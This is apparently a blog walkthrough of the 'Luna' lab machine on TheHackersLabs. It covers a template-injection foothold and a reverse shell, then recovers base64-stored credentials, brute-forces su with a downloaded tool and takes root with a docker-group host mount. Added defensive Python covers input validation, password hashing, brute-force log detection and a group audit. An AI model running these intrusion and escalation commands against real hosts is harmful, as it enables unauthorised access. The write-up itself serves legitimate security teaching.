TheHackersLabs-Luna-Walkthrough
城南花已开

Information Gathering

Service Enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.167 08:00:27:df:f5:4e PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:65:b2 VMware, Inc.

12 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.087 seconds (122.66 hosts/sec). 4 responded
export ip=192.168.60.167
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.167:80
Open 192.168.60.167:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-31 15:42 CST
Initiating ARP Ping Scan at 15:42
Scanning 192.168.60.167 [1 port]
Completed ARP Ping Scan at 15:42, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:42
Completed Parallel DNS resolution of 1 host. at 15:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:42
Scanning 192.168.60.167 [2 ports]
Discovered open port 80/tcp on 192.168.60.167
Discovered open port 5000/tcp on 192.168.60.167
Completed SYN Stealth Scan at 15:42, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.167
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-01-31 15:42:53 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
5000/tcp open upnp syn-ack ttl 64
MAC Address: 08:00:27:DF:F5:4E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Haha 🤣 this box is a bit unusual: port 22 is not even open.

Plain requests to port 80 all come back as 403 (access denied).

SSTI Injection

Port 5000 serves a welcome box:

"Please enter your name"

[screenshot]

But nothing can be typed into it, because the form field is disabled.

Simply edit the element's attributes by hand in the browser inspector.

[screenshot]

We try the input and it comes back as 49.

[screenshot]

That looks like SSTI.

For the details see [TheHackersLabs-Caldo de Avecren-Walkthrough | Pepster’Blog](https://pepster.me/2025/01/16/TheHackersLabs-Caldo de Avecren-Walkthrough/#SSTI注入)
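Two things in this section are worth making concrete from the defending side: the `disabled` attribute on the name field is a client-side hint that disappears the moment the element is edited, so validation has to happen on the server; and the arithmetic probe that renders as 49 means the input is being compiled as template source rather than inserted as data. The block below is an added example, not code from the original post or from the target application: it validates the "name" field server-side, flags template-engine syntax in submissions so they can be logged, and shows the shape of the fix (user data substituted as a value, never concatenated into the template). The sample submissions are constructed.

```python
import re

# Constructed sample submissions for the "Please enter your name" form on port
# 5000 (not captured from the box): normal names, the arithmetic probe whose
# rendering as 49 gave the SSTI away, other engines' markers, and bad input.
SAMPLE_SUBMISSIONS = [
    "Pepster",
    "María José",
    "{{7*7}}",
    "${7*7}",
    "<%= 7*7 %>",
    "Bob99",
    "a" * 200,
]

# Delimiters used by common template engines (Jinja2/Twig, EL/FreeMarker,
# ERB/JSP). A person's name never contains them, so their presence means the
# input is aimed at the template engine and should be logged as a probe.
TEMPLATE_MARKERS = re.compile(r"\{\{|\}\}|\{%|%\}|\{#|\$\{|<%|%>")

# Allow-list for a name: Unicode letters joined by single spaces, apostrophes
# or hyphens. [^\W\d_] is "any Unicode letter".
NAME_ALLOWED = re.compile(r"^[^\W\d_]+(?:[ '\-][^\W\d_]+)*$")


def looks_like_template_probe(value: str) -> bool:
    """True if the value contains template-engine syntax."""
    return TEMPLATE_MARKERS.search(value) is not None


def validate_name(value: str, max_len: int = 64) -> tuple:
    """Server-side validation. The <input disabled> attribute is enforced only by
    the browser and vanishes once the element is edited in the inspector, so
    the server must check the value itself."""
    if not value or len(value) > max_len:
        return (False, "length")
    if looks_like_template_probe(value):
        return (False, "template-marker")
    if not NAME_ALLOWED.match(value):
        return (False, "charset")
    return (True, "ok")


def render_greeting(name: str) -> str:
    """The fix for the injection itself: the template text is a constant and the
    user's value is passed in as data. The Flask equivalent is
    render_template_string("Welcome, {{ name }}!", name=name), never
    render_template_string("Welcome, " + name)."""
    return "Welcome, {name}!".format(name=name)


def triage(submissions=SAMPLE_SUBMISSIONS) -> dict:
    """Map each submission to its verdict, the shape a log/alert pipeline wants."""
    return {s: validate_name(s)[1] for s in submissions}
```

`render_greeting("{{7*7}}")` returns the literal text `Welcome, {{7*7}}!` because the braces arrive as a value, which is exactly the behaviour a template-injection probe is looking for the absence of.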

Listen on a port and we get a web shell.

There are quite a few users on this box.

❯ pwncat-cs -lp 4444
[15:49:18] Welcome to pwncat 🐈! __main__.py:164
[15:49:25] received connection from 192.168.60.167:51518 bind.py:84
[15:49:25] 0.0.0.0:4444: normalizing shell path manager.py:957
192.168.60.167:51518: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
juan:x:1001:1001::/home/juan:/bin/bash
jose:x:1002:1002::/home/jose:/bin/bash
john:x:1003:1003::/home/john:/bin/bash
carmen:x:1004:1004::/home/carmen:/bin/bash

Looking at the config file at the same time, we find SQL credentials.

(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ cat config.php
<?php
$servername = "localhost";
$username = "admin";
$password = "sporting";
$dbname = "rodgar";

// Create the connection
$conn = new mysqli($servername, $username, $password, $dbname);

// Verify the connection
if ($conn->connect_error) {
die("Conexión fallida: " . $conn->connect_error);
}
?>
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 192.168.60.167%enp0s17:68 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:35351 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:5000 0.0.0.0:* users:(("python",pid=1102,fd=4),("python",pid=1102,fd=3),("python",pid=748,fd=3))
tcp LISTEN 0 511 *:80 *:*

User Privilege Escalation

Getting juan's account

(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ mysql -uadmin -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.39-0ubuntu0.24.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| performance_schema |
| rodgar |
+--------------------+
3 rows in set (0,01 sec)

mysql> use rodgar;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+------------------+
| Tables_in_rodgar |
+------------------+
| user |
+------------------+
1 row in set (0,00 sec)

mysql> select * from user;
+-------+----------------------------------+
| users | password |
+-------+----------------------------------+
| juan | YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK |
+-------+----------------------------------+
1 row in set (0,00 sec)

With the password in hand we try to log in, but it fails.

The length is 32 characters, and nothing looks like it is deliberately one character short.

echo -n "YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK" |wc -c
32

Running it through a hash identifier says it is most likely base64. Silly me 😅

[screenshot]

echo -n "YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK" |base64 -d
c0o[UkmM2MTRTe8@jN.M(9b
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ su juan
Password:
juan@TheHackersLabs-Luna:/var/www/RODGAR$

Login successful.

We are given a password list, most likely meant for brute-forcing the remaining users.
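The detour above (a 32-character string mistaken for a hash) is the whole lesson of this step: the `user` table holds the password base64-encoded, which is an encoding anyone who can read the table can reverse, not a hash. The following is an added example, not code from the post or from the box: it tells a hex digest apart from base64 text, decodes the stored value from the table above, and shows what the column should hold instead (a salted PBKDF2-HMAC-SHA256 digest with constant-time verification). The `algorithm$iterations$salt$digest` record format is a constructed convention for the example.

```python
import base64
import binascii
import hashlib
import hmac
import os
import re
import string

# The value from the rodgar.user table above, reused to show it is reversible.
STORED_DB_VALUE = "YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK"
HEX_DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def classify_stored_value(value: str) -> str:
    """Tell a hex digest apart from base64 text. A 32-character string is not
    automatically an MD5 hash: base64 of a 24-byte payload is also 32 chars."""
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in HEX_DIGEST_LENGTHS:
        return f"hex digest, {HEX_DIGEST_LENGTHS[len(value)]}-sized"
    if len(value) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        try:
            decoded = base64.b64decode(value, validate=True)
        except binascii.Error:
            return "unknown"
        if all(chr(b) in string.printable for b in decoded):
            return "base64 of printable text (reversible, not a hash)"
        return "base64 of binary data"
    return "unknown"


def decode_base64_text(value: str) -> str:
    """Recover the original text. The trailing 0x0a inside the encoding (likely
    from `echo` without -n when the box was built) is stripped, which is why
    the raw decode did not work as a password until it was retyped."""
    return base64.b64decode(value, validate=True).decode().rstrip("\n")


PBKDF2_ITERATIONS = 600_000  # OWASP's current figure for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: bytes = b"") -> str:
    """What the table should hold: a salted, slow, one-way digest.
    Record format (constructed for this example): algo$iterations$salt_hex$digest_hex."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
```

With the stored record being a PBKDF2 digest, reading `config.php` and dumping the table (the path taken above) yields nothing that can be typed into `su`.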

juan@TheHackersLabs-Luna:~$ ls
password.txt user.txt
juan@TheHackersLabs-Luna:~$ cat user.txt
a81be4e9b20632860d20a64c054c4150
juan@TheHackersLabs-Luna:~$ cat password.txt
Tr0ub4dor&3
M0nkey!2024
L3tMeIn@2024
S3cur3P@ssw0rd
P@ssw0rd1234
G00dP@ssw0rd!
R3liable#2024
W1nter$2024
H@ppyD@y#1
4U&Me2Day!
B3stS3cur!ty
F1rst&Last@2024

I try putting together a user list.

echo -e "root\njuan\njose\njohn\ncarmen">user.txt
cat user.txt
root
juan
jose
john
carmen
(local) pwncat$ download password.txt
password.txt ━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 156/156 bytes • ? • 0:00:00
[16:03:38] downloaded 156.00B in 0.15 seconds
cat password.txt
Tr0ub4dor&3
M0nkey!2024
L3tMeIn@2024
S3cur3P@ssw0rd
P@ssw0rd1234
G00dP@ssw0rd!
R3liable#2024
W1nter$2024
H@ppyD@y#1
4U&Me2Day!
B3stS3cur!ty
F1rst&Last@2024

Then I almost forgot: the box does not expose port 22 for us to brute-force against 😅

So the only option is to switch users with su inside the box itself.

Upload suForce and brute-force with it.

(remote) juan@TheHackersLabs-Luna:/tmp$ wget 192.168.60.100/suForce
--2025-01-31 08:06:16-- http://192.168.60.100/suForce
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2430 (2,4K) [application/octet-stream]
Saving to: ‘suForce’

suForce 100%[===============>] 2,37K --.-KB/s in 0s

2025-01-31 08:06:16 (260 MB/s) - ‘suForce’ saved [2430/2430]

(remote) juan@TheHackersLabs-Luna:/tmp$ chmod +x suForce

Since suForce cannot take a user wordlist, the users have to be tried one at a time.

Luckily the first one hits.

(remote) juan@TheHackersLabs-Luna:/tmp$ ./suForce -u jose -w /home/juan/password.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | jose
📖 Wordlist | /home/juan/password.txt
🔎 Status | 8/12/66%/W1nter$2024
💥 Password | W1nter$2024
───────────────────────────────────
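The suForce run above is noisy from the host's point of view: every wrong guess lands in the auth log as a `pam_unix(su:auth): authentication failure` line naming both the source user (`ruser=`) and the target (`user=`), and the eventual hit shows up as a `session opened` line for the same pair. The block below is an added example, not part of the post or of suForce: a detector that reads an auth log, counts su failures per (source, target) pair inside a time window, and marks pairs where the burst was followed by a successful switch. The log excerpt is constructed to mirror the 8/12 result above (seven failures, then success).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt in pam_unix format (not from the box):
# seven failed su attempts juan -> jose within 20 seconds, then the successful
# eighth guess, plus one isolated failure against root that should not alert.
AUTH_LOG = """\
Jan 31 08:10:01 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:04 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:07 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:10 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:13 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:16 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:19 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=jose
Jan 31 08:10:22 luna su: (to jose) juan on pts/0
Jan 31 08:10:22 luna su: pam_unix(su:session): session opened for user jose(uid=1002) by juan(uid=1001)
Jan 31 08:25:40 luna su: pam_unix(su:auth): authentication failure; logname=juan uid=1001 euid=0 tty=/dev/pts/0 ruser=juan rhost=  user=root
"""

FAIL_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ su: pam_unix\(su:auth\): authentication failure;"
    r" .*?ruser=(\S+) .*?user=(\S+)"
)
OPEN_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ su: pam_unix\(su:session\): session opened"
    r" for user (\S+?)\(uid=\d+\) by (\S+?)\(uid=\d+\)"
)


def _ts(stamp: str) -> datetime:
    # syslog timestamps carry no year; only differences between them are used.
    return datetime.strptime(stamp, "%b %d %H:%M:%S")


def detect_su_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 120) -> list:
    """Flag (source, target) pairs with `threshold` or more su failures inside
    `window_seconds`. A burst followed by a session to the same target from the
    same source is the signature of a guessed password, not a forgotten one."""
    failures = defaultdict(list)
    opened = set()
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            stamp, ruser, target = m.groups()
            failures[(ruser, target)].append(_ts(stamp))
            continue
        m = OPEN_RE.match(line)
        if m:
            _stamp, target, by = m.groups()
            opened.add((by, target))

    alerts = []
    for (ruser, target), stamps in failures.items():
        stamps.sort()
        # Slide a window of `threshold` consecutive failures over the sorted times.
        for i in range(len(stamps) - threshold + 1):
            if (stamps[i + threshold - 1] - stamps[i]).total_seconds() <= window_seconds:
                alerts.append({
                    "source": ruser,
                    "target": target,
                    "failures": len(stamps),
                    "followed_by_success": (ruser, target) in opened,
                })
                break
    return alerts
```

On a real host the same signal is what `pam_faillock` acts on; a lockout after a handful of failures would have stopped the 12-word list above before it reached the eighth entry.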

Root Privilege Escalation

After switching to that user, we find the account is also a member of the docker group.

(remote) juan@TheHackersLabs-Luna:/tmp$ su jose
Password:
jose@TheHackersLabs-Luna:/tmp$ sudo -l
[sudo] password for jose:
Sorry, user jose may not run sudo on TheHackersLabs-Luna.
jose@TheHackersLabs-Luna:/tmp$ cd ~
jose@TheHackersLabs-Luna:~$ ls
jose@TheHackersLabs-Luna:~$ ls -al
total 8
drwxr-x--- 2 jose jose 4096 ago 13 14:34 .
drwxr-xr-x 6 root root 4096 ago 14 14:23 ..
lrwxrwxrwx 1 jose jose 9 ago 13 13:48 .bash_history -> /dev/null
jose@TheHackersLabs-Luna:~$ id
uid=1002(jose) gid=1002(jose) groups=1002(jose),111(docker)

Escalating through docker is all it takes.

If the image pull runs into network problems, enable TUN mode in Clash so the target machine can also get out to the internet.

jose@TheHackersLabs-Luna:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
1f3e46996e29: Pull complete
Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/root.txt
74cc1c60799e0a786ac7094b532f01b1
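Membership in the `docker` group is root on the host in everything but name, which is why one `docker run -v /:/mnt` command finishes the box. From the defending side the useful check is simply an inventory: which accounts sit in a root-equivalent group. The block below is an added example, not code from the post or from the box: it parses an `/etc/group` file and the `groups=` part of `id` output, and reports members of groups that grant root-equivalent access (`docker`, `lxd`, `disk`). The `/etc/group` excerpt is constructed to mirror the users seen above.

```python
import re

# Constructed /etc/group excerpt modelled on the box (not copied from it):
# jose is the only member of docker.
SAMPLE_ETC_GROUP = """\
root:x:0:
adm:x:4:syslog
sudo:x:27:
docker:x:111:jose
juan:x:1001:
jose:x:1002:
john:x:1003:
carmen:x:1004:
"""

# Groups whose membership is equivalent to root on a stock Linux host.
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can run containers with the host root filesystem mounted",
    "lxd": "can launch a privileged container over the host filesystem",
    "disk": "raw read/write on block devices bypasses file permissions",
}


def parse_group_file(text: str) -> dict:
    """/etc/group -> {group: set(members)}; the fourth field is comma-separated."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = {m for m in members.split(",") if m}
    return groups


def root_equivalent_members(text: str) -> dict:
    """Only the dangerous groups that actually have members."""
    groups = parse_group_file(text)
    return {g: groups[g] for g in ROOT_EQUIVALENT_GROUPS if groups.get(g)}


def groups_from_id_output(id_line: str) -> list:
    """Group names from the groups=1002(jose),111(docker) part of `id` output."""
    m = re.search(r"groups=(\S+)", id_line)
    if not m:
        return []
    return re.findall(r"\d+\(([^)]+)\)", m.group(1))


def audit_id_output(id_line: str) -> list:
    """Dangerous groups present in a single user's `id` output."""
    return [g for g in groups_from_id_output(id_line) if g in ROOT_EQUIVALENT_GROUPS]


def audit_group_file(text: str) -> list:
    """One finding per (user, group), ready for a report."""
    findings = []
    for group, members in sorted(root_equivalent_members(text).items()):
        for user in sorted(members):
            findings.append(f"{user} in {group}: {ROOT_EQUIVALENT_GROUPS[group]}")
    return findings
```

The remediation is the same whichever way the finding is produced: treat docker group membership as granting sudo without a password prompt, and give it only to accounts that are meant to have root (or run rootless Docker).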

🥳
